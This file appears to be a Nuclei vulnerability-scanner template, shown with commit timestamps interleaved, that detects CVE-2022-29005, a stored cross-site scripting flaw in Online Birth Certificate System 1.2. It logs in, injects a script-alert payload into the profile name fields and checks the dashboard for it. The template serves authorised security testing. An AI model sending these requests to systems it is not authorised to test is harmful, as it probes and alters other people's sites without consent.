nuclei-templates/http/cves/2022/CVE-2022-29005.yaml

63 lines
2.7 KiB
YAML
Raw Normal View History

2022-09-10 03:03:07 +00:00
id: CVE-2022-29005
2023-07-11 19:49:27 +00:00
info:
name: Online Birth Certificate System 1.2 - Stored Cross-Site Scripting
author: TenBird
severity: medium
description: |
Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.
2023-09-06 11:59:08 +00:00
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
- https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
- https://nvd.nist.gov/vuln/detail/CVE-2022-29005
- http://online.com
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29005
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00205
epss-percentile: 0.58459
cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 3
vendor: phpgurukul
2023-07-11 19:49:27 +00:00
product: online_birth_certificate_system
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,xss,obcs,authenticated,phpgurukul
2023-07-20 07:43:09 +00:00
variables:
str: "{{rand_base(6)}}"
http:
2022-09-10 03:03:07 +00:00
- raw:
- |
POST /obcs/user/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
mobno={{username}}&password={{password}}&login=
- |
POST /obcs/user/profile.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2023-07-20 07:43:09 +00:00
fname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
2022-09-10 03:03:07 +00:00
- |
GET /obcs/user/dashboard.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
2022-09-10 03:03:07 +00:00
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(header_3, "text/html")'
2022-09-10 03:03:07 +00:00
- 'status_code_3 == 200'
2023-07-20 07:43:09 +00:00
- contains(body_3, 'admin-name\">{{str}}<script>alert(document.domain);</script>')
2022-09-10 03:03:07 +00:00
condition: and
# digest: 4b0a00483046022100acfc88fbb67d2cd5843df7db44031e80d4a2fd12170e0c9205adb18f6081f720022100c8df692fe6c6ee79c6cf269b63c7fae88c0b48be07ca0fdc16731a06f62d23c1:922c64590222798bb761d5b6d8e72950